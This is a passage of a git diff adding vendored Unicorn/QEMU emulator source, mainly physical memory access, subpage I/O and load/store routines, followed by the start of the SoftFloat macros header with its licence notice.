Similar to qemu_get_ram_ptr + * but takes a size argument */ +static void *qemu_ram_ptr_length(struct uc_struct *uc, ram_addr_t addr, hwaddr *size) +{ + RAMBlock *block; + if (*size == 0) { + return NULL; + } + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + if (addr - block->offset < block->length) { + if (addr - block->offset + *size > block->length) + *size = block->length - addr + block->offset; + return block->host + (addr - block->offset); + } + } + + fprintf(stderr, "Bad ram offset %" PRIx64 "\n", (uint64_t)addr); + abort(); +} + +/* Some of the softmmu routines need to translate from a host pointer + (typically a TLB entry) back to a ram offset. */ +MemoryRegion *qemu_ram_addr_from_host(struct uc_struct *uc, void *ptr, ram_addr_t *ram_addr) +{ + RAMBlock *block; + uint8_t *host = ptr; + + block = uc->ram_list.mru_block; + if (block && block->host && host - block->host < block->length) { + goto found; + } + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + /* This case append when the block is not mapped. 
*/ + if (block->host == NULL) { + continue; + } + if (host - block->host < block->length) { + goto found; + } + } + + return NULL; + +found: + *ram_addr = block->offset + (host - block->host); + return block->mr; +} + +static uint64_t subpage_read(struct uc_struct* uc, void *opaque, hwaddr addr, + unsigned len) +{ + subpage_t *subpage = opaque; + uint8_t buf[4]; + +#if defined(DEBUG_SUBPAGE) + printf("%s: subpage %p len %u addr " TARGET_FMT_plx "\n", __func__, + subpage, len, addr); +#endif + address_space_read(subpage->as, addr + subpage->base, buf, len); + switch (len) { + case 1: + return ldub_p(buf); + case 2: + return lduw_p(buf); + case 4: + return ldl_p(buf); + default: + abort(); + } +} + +static void subpage_write(struct uc_struct* uc, void *opaque, hwaddr addr, + uint64_t value, unsigned len) +{ + subpage_t *subpage = opaque; + uint8_t buf[4]; + +#if defined(DEBUG_SUBPAGE) + printf("%s: subpage %p len %u addr " TARGET_FMT_plx + " value %"PRIx64"\n", + __func__, subpage, len, addr, value); +#endif + switch (len) { + case 1: + stb_p(buf, value); + break; + case 2: + stw_p(buf, value); + break; + case 4: + stl_p(buf, value); + break; + default: + abort(); + } + address_space_write(subpage->as, addr + subpage->base, buf, len); +} + +static bool subpage_accepts(void *opaque, hwaddr addr, + unsigned len, bool is_write) +{ + subpage_t *subpage = opaque; +#if defined(DEBUG_SUBPAGE) + printf("%s: subpage %p %c len %u addr " TARGET_FMT_plx "\n", + __func__, subpage, is_write ? 
'w' : 'r', len, addr); +#endif + + return address_space_access_valid(subpage->as, addr + subpage->base, + len, is_write); +} + +static const MemoryRegionOps subpage_ops = { + subpage_read, + subpage_write, + DEVICE_NATIVE_ENDIAN, + { + 0, 0, false, subpage_accepts, + }, +}; + +static int subpage_register (subpage_t *mmio, uint32_t start, uint32_t end, + uint16_t section) +{ + int idx, eidx; + + if (start >= TARGET_PAGE_SIZE || end >= TARGET_PAGE_SIZE) + return -1; + idx = SUBPAGE_IDX(start); + eidx = SUBPAGE_IDX(end); +#if defined(DEBUG_SUBPAGE) + printf("%s: %p start %08x end %08x idx %08x eidx %08x section %d\n", + __func__, mmio, start, end, idx, eidx, section); +#endif + for (; idx <= eidx; idx++) { + mmio->sub_section[idx] = section; + } + + return 0; +} + +static void notdirty_mem_write(struct uc_struct* uc, void *opaque, hwaddr ram_addr, + uint64_t val, unsigned size) +{ + if (!cpu_physical_memory_get_dirty_flag(uc, ram_addr, DIRTY_MEMORY_CODE)) { + tb_invalidate_phys_page_fast(uc, ram_addr, size); + } + switch (size) { + case 1: + stb_p(qemu_get_ram_ptr(uc, ram_addr), val); + break; + case 2: + stw_p(qemu_get_ram_ptr(uc, ram_addr), val); + break; + case 4: + stl_p(qemu_get_ram_ptr(uc, ram_addr), val); + break; + default: + abort(); + } + /* we remove the notdirty callback only if the code has been + flushed */ + if (!cpu_physical_memory_is_clean(uc, ram_addr)) { + CPUArchState *env = uc->current_cpu->env_ptr; + tlb_set_dirty(env, uc->current_cpu->mem_io_vaddr); + } +} + +static bool notdirty_mem_accepts(void *opaque, hwaddr addr, + unsigned size, bool is_write) +{ + return is_write; +} + +static const MemoryRegionOps notdirty_mem_ops = { + NULL, + notdirty_mem_write, + DEVICE_NATIVE_ENDIAN, + { + 0, 0, false, notdirty_mem_accepts, + }, +}; + +static void io_mem_init(struct uc_struct* uc) +{ + memory_region_init_io(uc, &uc->io_mem_rom, NULL, &unassigned_mem_ops, NULL, NULL, UINT64_MAX); + memory_region_init_io(uc, &uc->io_mem_unassigned, NULL, 
&unassigned_mem_ops, NULL, + NULL, UINT64_MAX); + memory_region_init_io(uc, &uc->io_mem_notdirty, NULL, &notdirty_mem_ops, NULL, + NULL, UINT64_MAX); + //memory_region_init_io(uc, &uc->io_mem_watch, NULL, &watch_mem_ops, NULL, + // NULL, UINT64_MAX); +} + +static subpage_t *subpage_init(AddressSpace *as, hwaddr base) +{ + subpage_t *mmio; + + mmio = g_malloc0(sizeof(subpage_t)); + + mmio->as = as; + mmio->base = base; + memory_region_init_io(as->uc, &mmio->iomem, NULL, &subpage_ops, mmio, + NULL, TARGET_PAGE_SIZE); + mmio->iomem.subpage = true; +#if defined(DEBUG_SUBPAGE) + printf("%s: %p base " TARGET_FMT_plx " len %08x\n", __func__, + mmio, base, TARGET_PAGE_SIZE); +#endif + subpage_register(mmio, 0, TARGET_PAGE_SIZE-1, PHYS_SECTION_UNASSIGNED); + + return mmio; +} + +static uint16_t dummy_section(PhysPageMap *map, AddressSpace *as, + MemoryRegion *mr) +{ + MemoryRegionSection section = MemoryRegionSection_make( + mr, as, 0, + int128_2_64(), + false, + 0 + ); + + assert(as); + + return phys_section_add(map, &section); +} + +MemoryRegion *iotlb_to_region(AddressSpace *as, hwaddr index) +{ + return as->dispatch->map.sections[index & ~TARGET_PAGE_MASK].mr; +} + +void phys_mem_clean(struct uc_struct* uc) +{ + AddressSpaceDispatch* d = uc->as.next_dispatch; + g_free(d->map.sections); +} + +static void mem_begin(MemoryListener *listener) +{ + AddressSpace *as = container_of(listener, AddressSpace, dispatch_listener); + AddressSpaceDispatch *d = g_new0(AddressSpaceDispatch, 1); + uint16_t n; + PhysPageEntry ppe = { 1, PHYS_MAP_NODE_NIL }; + struct uc_struct *uc = as->uc; + + n = dummy_section(&d->map, as, &uc->io_mem_unassigned); + assert(n == PHYS_SECTION_UNASSIGNED); + n = dummy_section(&d->map, as, &uc->io_mem_notdirty); + assert(n == PHYS_SECTION_NOTDIRTY); + n = dummy_section(&d->map, as, &uc->io_mem_rom); + assert(n == PHYS_SECTION_ROM); + // n = dummy_section(&d->map, as, &uc->io_mem_watch); + // assert(n == PHYS_SECTION_WATCH); + + d->phys_map = ppe; + d->as = as; + 
as->next_dispatch = d; +} + +static void mem_commit(MemoryListener *listener) +{ + AddressSpace *as = container_of(listener, AddressSpace, dispatch_listener); + AddressSpaceDispatch *cur = as->dispatch; + AddressSpaceDispatch *next = as->next_dispatch; + + phys_page_compact_all(next, next->map.nodes_nb); + + as->dispatch = next; + + if (cur) { + phys_sections_free(&cur->map); + g_free(cur); + } +} + +static void tcg_commit(MemoryListener *listener) +{ + struct uc_struct* uc = listener->address_space_filter->uc; + + /* since each CPU stores ram addresses in its TLB cache, we must + reset the modified entries */ + /* XXX: slow ! */ + tlb_flush(uc->cpu, 1); +} + +void address_space_init_dispatch(AddressSpace *as) +{ + MemoryListener ml = { 0 }; + + ml.begin = mem_begin; + ml.commit = mem_commit; + ml.region_add = mem_add; + ml.region_nop = mem_add; + ml.priority = 0; + + as->dispatch = NULL; + as->dispatch_listener = ml; + memory_listener_register(as->uc, &as->dispatch_listener, as); +} + +void address_space_unregister(AddressSpace *as) +{ + memory_listener_unregister(as->uc, &as->dispatch_listener); +} + +void address_space_destroy_dispatch(AddressSpace *as) +{ + AddressSpaceDispatch *d = as->dispatch; + + memory_listener_unregister(as->uc, &as->dispatch_listener); + g_free(d->map.nodes); + g_free(d); + + if (as->dispatch != as->next_dispatch) { + d = as->next_dispatch; + g_free(d->map.nodes); + g_free(d); + } + + as->dispatch = NULL; + as->next_dispatch = NULL; +} + +static void memory_map_init(struct uc_struct *uc) +{ + uc->system_memory = g_malloc(sizeof(*(uc->system_memory))); + + memory_region_init(uc, uc->system_memory, NULL, "system", UINT64_MAX); + address_space_init(uc, &uc->as, uc->system_memory, "memory"); +} + +void cpu_exec_init_all(struct uc_struct *uc) +{ +#if !defined(CONFIG_USER_ONLY) + memory_map_init(uc); +#endif + io_mem_init(uc); +} + +MemoryRegion *get_system_memory(struct uc_struct *uc) +{ + return uc->system_memory; +} + +#endif /* 
!defined(CONFIG_USER_ONLY) */ + +/* physical memory access (slow version, mainly for debug) */ +#if defined(CONFIG_USER_ONLY) +int cpu_memory_rw_debug(CPUState *cpu, target_ulong addr, + uint8_t *buf, int len, int is_write) +{ + int l, flags; + target_ulong page; + void * p; + + while (len > 0) { + page = addr & TARGET_PAGE_MASK; + l = (page + TARGET_PAGE_SIZE) - addr; + if (l > len) + l = len; + flags = page_get_flags(page); + if (!(flags & PAGE_VALID)) + return -1; + if (is_write) { + if (!(flags & PAGE_WRITE)) + return -1; + /* XXX: this code should not depend on lock_user */ + if (!(p = lock_user(VERIFY_WRITE, addr, l, 0))) + return -1; + memcpy(p, buf, l); + unlock_user(p, addr, l); + } else { + if (!(flags & PAGE_READ)) + return -1; + /* XXX: this code should not depend on lock_user */ + if (!(p = lock_user(VERIFY_READ, addr, l, 1))) + return -1; + memcpy(buf, p, l); + unlock_user(p, addr, 0); + } + len -= l; + buf += l; + addr += l; + } + return 0; +} + +#else + +static void invalidate_and_set_dirty(struct uc_struct *uc, hwaddr addr, + hwaddr length) +{ + if (cpu_physical_memory_range_includes_clean(uc, addr, length)) { + tb_invalidate_phys_range(uc, addr, addr + length, 0); + } +} + +static int memory_access_size(MemoryRegion *mr, unsigned l, hwaddr addr) +{ + unsigned access_size_max = mr->ops->valid.max_access_size; + + /* Regions are assumed to support 1-4 byte accesses unless + otherwise specified. */ + if (access_size_max == 0) { + access_size_max = 4; + } + + /* Bound the maximum access by the alignment of the address. */ + if (!mr->ops->impl.unaligned) { + unsigned align_size_max = addr & (0-addr); + if (align_size_max != 0 && align_size_max < access_size_max) { + access_size_max = align_size_max; + } + } + + /* Don't attempt accesses larger than the maximum. 
*/ + if (l > access_size_max) { + l = access_size_max; + } + if (l & (l - 1)) { + l = 1 << (qemu_fls(l) - 1); + } + + return l; +} + +bool address_space_rw(AddressSpace *as, hwaddr addr, uint8_t *buf, + int len, bool is_write) +{ + hwaddr l; + uint8_t *ptr; + uint64_t val; + hwaddr addr1; + MemoryRegion *mr; + bool error = false; + + while (len > 0) { + l = len; + + mr = address_space_translate(as, addr, &addr1, &l, is_write); + if (!mr) + return true; + + if (is_write) { + if (!memory_access_is_direct(mr, is_write)) { + l = memory_access_size(mr, l, addr1); + /* XXX: could force current_cpu to NULL to avoid + potential bugs */ + switch (l) { + case 8: + /* 64 bit write access */ + val = ldq_p(buf); + error |= io_mem_write(mr, addr1, val, 8); + break; + case 4: + /* 32 bit write access */ + val = ldl_p(buf); + error |= io_mem_write(mr, addr1, val, 4); + break; + case 2: + /* 16 bit write access */ + val = lduw_p(buf); + error |= io_mem_write(mr, addr1, val, 2); + break; + case 1: + /* 8 bit write access */ + val = ldub_p(buf); + error |= io_mem_write(mr, addr1, val, 1); + break; + default: + abort(); + } + } else { + addr1 += memory_region_get_ram_addr(mr); + /* RAM case */ + ptr = qemu_get_ram_ptr(as->uc, addr1); + memcpy(ptr, buf, l); + invalidate_and_set_dirty(as->uc, addr1, l); + } + } else { + if (!memory_access_is_direct(mr, is_write)) { + /* I/O case */ + l = memory_access_size(mr, l, addr1); + + switch (l) { + case 8: + /* 64 bit read access */ + error |= io_mem_read(mr, addr1, &val, 8); + stq_p(buf, val); + break; + case 4: + /* 32 bit read access */ + error |= io_mem_read(mr, addr1, &val, 4); + stl_p(buf, val); + break; + case 2: + /* 16 bit read access */ + error |= io_mem_read(mr, addr1, &val, 2); + stw_p(buf, val); + break; + case 1: + /* 8 bit read access */ + error |= io_mem_read(mr, addr1, &val, 1); + stb_p(buf, val); + break; + default: + abort(); + } + } else { + /* RAM case */ + ptr = qemu_get_ram_ptr(as->uc, mr->ram_addr + addr1); + memcpy(buf, 
ptr, l); + } + } + len -= l; + buf += l; + addr += l; + } + + return error; +} + +bool address_space_write(AddressSpace *as, hwaddr addr, + const uint8_t *buf, int len) +{ + return address_space_rw(as, addr, (uint8_t *)buf, len, true); +} + +bool address_space_read(AddressSpace *as, hwaddr addr, uint8_t *buf, int len) +{ + return address_space_rw(as, addr, buf, len, false); +} + + +bool cpu_physical_memory_rw(AddressSpace *as, hwaddr addr, uint8_t *buf, + int len, int is_write) +{ + return address_space_rw(as, addr, buf, len, is_write); +} + +enum write_rom_type { + WRITE_DATA, + FLUSH_CACHE, +}; + +static inline void cpu_physical_memory_write_rom_internal(AddressSpace *as, + hwaddr addr, const uint8_t *buf, int len, enum write_rom_type type) +{ + hwaddr l; + uint8_t *ptr; + hwaddr addr1; + MemoryRegion *mr; + + while (len > 0) { + l = len; + mr = address_space_translate(as, addr, &addr1, &l, true); + + if (!(memory_region_is_ram(mr) || + memory_region_is_romd(mr))) { + /* do nothing */ + } else { + addr1 += memory_region_get_ram_addr(mr); + /* ROM/RAM case */ + ptr = qemu_get_ram_ptr(as->uc, addr1); + switch (type) { + case WRITE_DATA: + memcpy(ptr, buf, l); + invalidate_and_set_dirty(as->uc, addr1, l); + break; + case FLUSH_CACHE: + flush_icache_range((uintptr_t)ptr, (uintptr_t)ptr + l); + break; + } + } + len -= l; + buf += l; + addr += l; + } +} + +/* used for ROM loading : can write in RAM and ROM */ +DEFAULT_VISIBILITY +void cpu_physical_memory_write_rom(AddressSpace *as, hwaddr addr, + const uint8_t *buf, int len) +{ + cpu_physical_memory_write_rom_internal(as, addr, buf, len, WRITE_DATA); +} + +void cpu_flush_icache_range(AddressSpace *as, hwaddr start, int len) +{ + /* + * This function should do the same thing as an icache flush that was + * triggered from within the guest. For TCG we are always cache coherent, + * so there is no need to flush anything. For KVM / Xen we need to flush + * the host's instruction cache at least. 
+ */ + if (tcg_enabled(as->uc)) { + return; + } + + cpu_physical_memory_write_rom_internal(as, + start, NULL, len, FLUSH_CACHE); +} + + +bool address_space_access_valid(AddressSpace *as, hwaddr addr, int len, bool is_write) +{ + MemoryRegion *mr; + hwaddr l, xlat; + + while (len > 0) { + l = len; + mr = address_space_translate(as, addr, &xlat, &l, is_write); + if (!memory_access_is_direct(mr, is_write)) { + l = memory_access_size(mr, l, addr); + if (!memory_region_access_valid(mr, xlat, l, is_write)) { + return false; + } + } + + len -= l; + addr += l; + } + return true; +} + +/* Map a physical memory region into a host virtual address. + * May map a subset of the requested range, given by and returned in *plen. + * May return NULL if resources needed to perform the mapping are exhausted. + * Use only for reads OR writes - not for read-modify-write operations. + * Use cpu_register_map_client() to know when retrying the map operation is + * likely to succeed. + */ +void *address_space_map(AddressSpace *as, + hwaddr addr, + hwaddr *plen, + bool is_write) +{ + hwaddr len = *plen; + hwaddr done = 0; + hwaddr l, xlat, base; + MemoryRegion *mr, *this_mr; + ram_addr_t raddr; + + if (len == 0) { + return NULL; + } + + l = len; + mr = address_space_translate(as, addr, &xlat, &l, is_write); + if (!memory_access_is_direct(mr, is_write)) { + if (as->uc->bounce.buffer) { + return NULL; + } + /* Avoid unbounded allocations */ + l = MIN(l, TARGET_PAGE_SIZE); + as->uc->bounce.buffer = qemu_memalign(TARGET_PAGE_SIZE, l); + as->uc->bounce.addr = addr; + as->uc->bounce.len = l; + + memory_region_ref(mr); + as->uc->bounce.mr = mr; + if (!is_write) { + address_space_read(as, addr, as->uc->bounce.buffer, l); + } + + *plen = l; + return as->uc->bounce.buffer; + } + + base = xlat; + raddr = memory_region_get_ram_addr(mr); + + for (;;) { + len -= l; + addr += l; + done += l; + if (len == 0) { + break; + } + + l = len; + this_mr = address_space_translate(as, addr, &xlat, &l, is_write); + if 
(this_mr != mr || xlat != base + done) { + break; + } + } + + memory_region_ref(mr); + *plen = done; + return qemu_ram_ptr_length(as->uc, raddr + base, plen); +} + +/* Unmaps a memory region previously mapped by address_space_map(). + * Will also mark the memory as dirty if is_write == 1. access_len gives + * the amount of memory that was actually read or written by the caller. + */ +void address_space_unmap(AddressSpace *as, void *buffer, hwaddr len, + int is_write, hwaddr access_len) +{ + if (buffer != as->uc->bounce.buffer) { + MemoryRegion *mr; + ram_addr_t addr1; + + mr = qemu_ram_addr_from_host(as->uc, buffer, &addr1); + assert(mr != NULL); + if (is_write) { + invalidate_and_set_dirty(as->uc, addr1, access_len); + } + memory_region_unref(mr); + return; + } + if (is_write) { + address_space_write(as, as->uc->bounce.addr, as->uc->bounce.buffer, access_len); + } + qemu_vfree(as->uc->bounce.buffer); + as->uc->bounce.buffer = NULL; + memory_region_unref(as->uc->bounce.mr); +} + +void *cpu_physical_memory_map(AddressSpace *as, hwaddr addr, + hwaddr *plen, + int is_write) +{ + return address_space_map(as, addr, plen, is_write); +} + +void cpu_physical_memory_unmap(AddressSpace *as, void *buffer, hwaddr len, + int is_write, hwaddr access_len) +{ + address_space_unmap(as, buffer, len, is_write, access_len); +} + +/* warning: addr must be aligned */ +static inline uint32_t ldl_phys_internal(AddressSpace *as, hwaddr addr, + enum device_endian endian) +{ + uint8_t *ptr; + uint64_t val; + MemoryRegion *mr; + hwaddr l = 4; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, false); + if (l < 4 || !memory_access_is_direct(mr, false)) { + /* I/O case */ + io_mem_read(mr, addr1, &val, 4); +#if defined(TARGET_WORDS_BIGENDIAN) + if (endian == DEVICE_LITTLE_ENDIAN) { + val = bswap32(val); + } +#else + if (endian == DEVICE_BIG_ENDIAN) { + val = bswap32(val); + } +#endif + } else { + /* RAM case */ + ptr = qemu_get_ram_ptr(as->uc, (memory_region_get_ram_addr(mr) 
+ & TARGET_PAGE_MASK) + + addr1); + switch (endian) { + case DEVICE_LITTLE_ENDIAN: + val = ldl_le_p(ptr); + break; + case DEVICE_BIG_ENDIAN: + val = ldl_be_p(ptr); + break; + default: + val = ldl_p(ptr); + break; + } + } + return val; +} + +uint32_t ldl_phys(AddressSpace *as, hwaddr addr) +{ + return ldl_phys_internal(as, addr, DEVICE_NATIVE_ENDIAN); +} + +uint32_t ldl_le_phys(AddressSpace *as, hwaddr addr) +{ + return ldl_phys_internal(as, addr, DEVICE_LITTLE_ENDIAN); +} + +uint32_t ldl_be_phys(AddressSpace *as, hwaddr addr) +{ + return ldl_phys_internal(as, addr, DEVICE_BIG_ENDIAN); +} + +/* warning: addr must be aligned */ +static inline uint64_t ldq_phys_internal(AddressSpace *as, hwaddr addr, + enum device_endian endian) +{ + uint8_t *ptr; + uint64_t val; + MemoryRegion *mr; + hwaddr l = 8; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, + false); + if (l < 8 || !memory_access_is_direct(mr, false)) { + /* I/O case */ + io_mem_read(mr, addr1, &val, 8); +#if defined(TARGET_WORDS_BIGENDIAN) + if (endian == DEVICE_LITTLE_ENDIAN) { + val = bswap64(val); + } +#else + if (endian == DEVICE_BIG_ENDIAN) { + val = bswap64(val); + } +#endif + } else { + /* RAM case */ + ptr = qemu_get_ram_ptr(as->uc, (memory_region_get_ram_addr(mr) + & TARGET_PAGE_MASK) + + addr1); + switch (endian) { + case DEVICE_LITTLE_ENDIAN: + val = ldq_le_p(ptr); + break; + case DEVICE_BIG_ENDIAN: + val = ldq_be_p(ptr); + break; + default: + val = ldq_p(ptr); + break; + } + } + return val; +} + +uint64_t ldq_phys(AddressSpace *as, hwaddr addr) +{ + return ldq_phys_internal(as, addr, DEVICE_NATIVE_ENDIAN); +} + +uint64_t ldq_le_phys(AddressSpace *as, hwaddr addr) +{ + return ldq_phys_internal(as, addr, DEVICE_LITTLE_ENDIAN); +} + +uint64_t ldq_be_phys(AddressSpace *as, hwaddr addr) +{ + return ldq_phys_internal(as, addr, DEVICE_BIG_ENDIAN); +} + +/* XXX: optimize */ +uint32_t ldub_phys(AddressSpace *as, hwaddr addr) +{ + uint8_t val; + address_space_rw(as, addr, &val, 1, 0); + 
return val; +} + +/* warning: addr must be aligned */ +static inline uint32_t lduw_phys_internal(AddressSpace *as, hwaddr addr, + enum device_endian endian) +{ + uint8_t *ptr; + uint64_t val; + MemoryRegion *mr; + hwaddr l = 2; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, + false); + if (l < 2 || !memory_access_is_direct(mr, false)) { + /* I/O case */ + io_mem_read(mr, addr1, &val, 2); +#if defined(TARGET_WORDS_BIGENDIAN) + if (endian == DEVICE_LITTLE_ENDIAN) { + val = bswap16(val); + } +#else + if (endian == DEVICE_BIG_ENDIAN) { + val = bswap16(val); + } +#endif + } else { + /* RAM case */ + ptr = qemu_get_ram_ptr(as->uc, (memory_region_get_ram_addr(mr) + & TARGET_PAGE_MASK) + + addr1); + switch (endian) { + case DEVICE_LITTLE_ENDIAN: + val = lduw_le_p(ptr); + break; + case DEVICE_BIG_ENDIAN: + val = lduw_be_p(ptr); + break; + default: + val = lduw_p(ptr); + break; + } + } + return val; +} + +uint32_t lduw_phys(AddressSpace *as, hwaddr addr) +{ + return lduw_phys_internal(as, addr, DEVICE_NATIVE_ENDIAN); +} + +uint32_t lduw_le_phys(AddressSpace *as, hwaddr addr) +{ + return lduw_phys_internal(as, addr, DEVICE_LITTLE_ENDIAN); +} + +uint32_t lduw_be_phys(AddressSpace *as, hwaddr addr) +{ + return lduw_phys_internal(as, addr, DEVICE_BIG_ENDIAN); +} + +/* warning: addr must be aligned. The ram page is not masked as dirty + and the code inside is not invalidated. 
It is useful if the dirty + bits are used to track modified PTEs */ +void stl_phys_notdirty(AddressSpace *as, hwaddr addr, uint32_t val) +{ + uint8_t *ptr; + MemoryRegion *mr; + hwaddr l = 4; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, + true); + if (l < 4 || !memory_access_is_direct(mr, true)) { + io_mem_write(mr, addr1, val, 4); + } else { + addr1 += memory_region_get_ram_addr(mr) & TARGET_PAGE_MASK; + ptr = qemu_get_ram_ptr(as->uc, addr1); + stl_p(ptr, val); + } +} + +/* warning: addr must be aligned */ +static inline void stl_phys_internal(AddressSpace *as, + hwaddr addr, uint32_t val, + enum device_endian endian) +{ + uint8_t *ptr; + MemoryRegion *mr; + hwaddr l = 4; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, + true); + if (l < 4 || !memory_access_is_direct(mr, true)) { +#if defined(TARGET_WORDS_BIGENDIAN) + if (endian == DEVICE_LITTLE_ENDIAN) { + val = bswap32(val); + } +#else + if (endian == DEVICE_BIG_ENDIAN) { + val = bswap32(val); + } +#endif + io_mem_write(mr, addr1, val, 4); + } else { + /* RAM case */ + addr1 += memory_region_get_ram_addr(mr) & TARGET_PAGE_MASK; + ptr = qemu_get_ram_ptr(as->uc, addr1); + switch (endian) { + case DEVICE_LITTLE_ENDIAN: + stl_le_p(ptr, val); + break; + case DEVICE_BIG_ENDIAN: + stl_be_p(ptr, val); + break; + default: + stl_p(ptr, val); + break; + } + invalidate_and_set_dirty(mr->uc, addr1, 4); + } +} + +void stl_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stl_phys_internal(as, addr, val, DEVICE_NATIVE_ENDIAN); +} + +void stl_le_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stl_phys_internal(as, addr, val, DEVICE_LITTLE_ENDIAN); +} + +void stl_be_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stl_phys_internal(as, addr, val, DEVICE_BIG_ENDIAN); +} + +/* XXX: optimize */ +void stb_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + uint8_t v = val; + address_space_rw(as, addr, &v, 1, 1); +} + +/* warning: addr must be aligned */ +static 
inline void stw_phys_internal(AddressSpace *as, + hwaddr addr, uint32_t val, + enum device_endian endian) +{ + uint8_t *ptr; + MemoryRegion *mr; + hwaddr l = 2; + hwaddr addr1; + + mr = address_space_translate(as, addr, &addr1, &l, true); + if (l < 2 || !memory_access_is_direct(mr, true)) { +#if defined(TARGET_WORDS_BIGENDIAN) + if (endian == DEVICE_LITTLE_ENDIAN) { + val = bswap16(val); + } +#else + if (endian == DEVICE_BIG_ENDIAN) { + val = bswap16(val); + } +#endif + io_mem_write(mr, addr1, val, 2); + } else { + /* RAM case */ + addr1 += memory_region_get_ram_addr(mr) & TARGET_PAGE_MASK; + ptr = qemu_get_ram_ptr(as->uc, addr1); + switch (endian) { + case DEVICE_LITTLE_ENDIAN: + stw_le_p(ptr, val); + break; + case DEVICE_BIG_ENDIAN: + stw_be_p(ptr, val); + break; + default: + stw_p(ptr, val); + break; + } + invalidate_and_set_dirty(as->uc, addr1, 2); + } +} + +void stw_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stw_phys_internal(as, addr, val, DEVICE_NATIVE_ENDIAN); +} + +void stw_le_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stw_phys_internal(as, addr, val, DEVICE_LITTLE_ENDIAN); +} + +void stw_be_phys(AddressSpace *as, hwaddr addr, uint32_t val) +{ + stw_phys_internal(as, addr, val, DEVICE_BIG_ENDIAN); +} + +/* XXX: optimize */ +void stq_phys(AddressSpace *as, hwaddr addr, uint64_t val) +{ + val = tswap64(val); + address_space_rw(as, addr, (void *) &val, 8, 1); +} + +void stq_le_phys(AddressSpace *as, hwaddr addr, uint64_t val) +{ + val = cpu_to_le64(val); + address_space_rw(as, addr, (void *) &val, 8, 1); +} + +void stq_be_phys(AddressSpace *as, hwaddr addr, uint64_t val) +{ + val = cpu_to_be64(val); + address_space_rw(as, addr, (void *) &val, 8, 1); +} + +/* virtual memory access for debug (includes writing to ROM) */ +int cpu_memory_rw_debug(CPUState *cpu, target_ulong addr, + uint8_t *buf, int len, int is_write) +{ + int l; + hwaddr phys_addr; + target_ulong page; + + while (len > 0) { + page = addr & TARGET_PAGE_MASK; + phys_addr = 
cpu_get_phys_page_debug(cpu, page); + /* if no physical page mapped, return an error */ + if (phys_addr == -1) + return -1; + l = (page + TARGET_PAGE_SIZE) - addr; + if (l > len) + l = len; + phys_addr += (addr & ~TARGET_PAGE_MASK); + if (is_write) { + cpu_physical_memory_write_rom(cpu->as, phys_addr, buf, l); + } else { + address_space_rw(cpu->as, phys_addr, buf, l, 0); + } + len -= l; + buf += l; + addr += l; + } + return 0; +} +#endif + +/* + * A helper function for the _utterly broken_ virtio device model to find out if + * it's running on a big endian machine. Don't do this at home kids! + */ +bool target_words_bigendian(void); +bool target_words_bigendian(void) +{ +#if defined(TARGET_WORDS_BIGENDIAN) + return true; +#else + return false; +#endif +} + +#ifndef CONFIG_USER_ONLY +bool cpu_physical_memory_is_io(AddressSpace *as, hwaddr phys_addr) +{ + MemoryRegion*mr; + hwaddr l = 1; + + mr = address_space_translate(as, phys_addr, &phys_addr, &l, false); + + return !(memory_region_is_ram(mr) || + memory_region_is_romd(mr)); +} + +void qemu_ram_foreach_block(struct uc_struct *uc, RAMBlockIterFunc func, void *opaque) +{ + RAMBlock *block; + + QTAILQ_FOREACH(block, &uc->ram_list.blocks, next) { + func(block->host, block->offset, block->length, opaque); + } +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-macros.h b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-macros.h new file mode 100644 index 0000000..2892b4f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/fpu/softfloat-macros.h @@ -0,0 +1,749 @@ +/* + * QEMU float support macros + * + * Derived from SoftFloat. + */ + +/*============================================================================ + +This C source fragment is part of the SoftFloat IEC/IEEE Floating-point +Arithmetic Package, Release 2b. + +Written by John R. Hauser. 
This work was made possible in part by the +International Computer Science Institute, located at Suite 600, 1947 Center +Street, Berkeley, California 94704. Funding was partially provided by the +National Science Foundation under grant MIP-9311980. The original version +of this code was written as part of a project to build a fixed-point vector +processor in collaboration with the University of California at Berkeley, +overseen by Profs. Nelson Morgan and John Wawrzynek. More information +is available through the Web page `http://www.cs.berkeley.edu/~jhauser/ +arithmetic/SoftFloat.html'. + +THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has +been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT TIMES +RESULT IN INCORRECT BEHAVIOR. USE OF THIS SOFTWARE IS RESTRICTED TO PERSONS +AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ALL LOSSES, +COSTS, OR OTHER PROBLEMS THEY INCUR DUE TO THE SOFTWARE, AND WHO FURTHERMORE +EFFECTIVELY INDEMNIFY JOHN HAUSER AND THE INTERNATIONAL COMPUTER SCIENCE +INSTITUTE (possibly via similar legal notice) AGAINST ALL LOSSES, COSTS, OR +OTHER PROBLEMS INCURRED BY THEIR CUSTOMERS AND CLIENTS DUE TO THE SOFTWARE. + +Derivative works are acceptable, even for commercial purposes, so long as +(1) the source code for the derivative work includes prominent notice that +the work is derivative, and (2) the source code includes prominent notice with +these four paragraphs for those parts of this code that are retained. + +=============================================================================*/ + +/*---------------------------------------------------------------------------- +| This macro tests for minimum version of the GNU C compiler. 
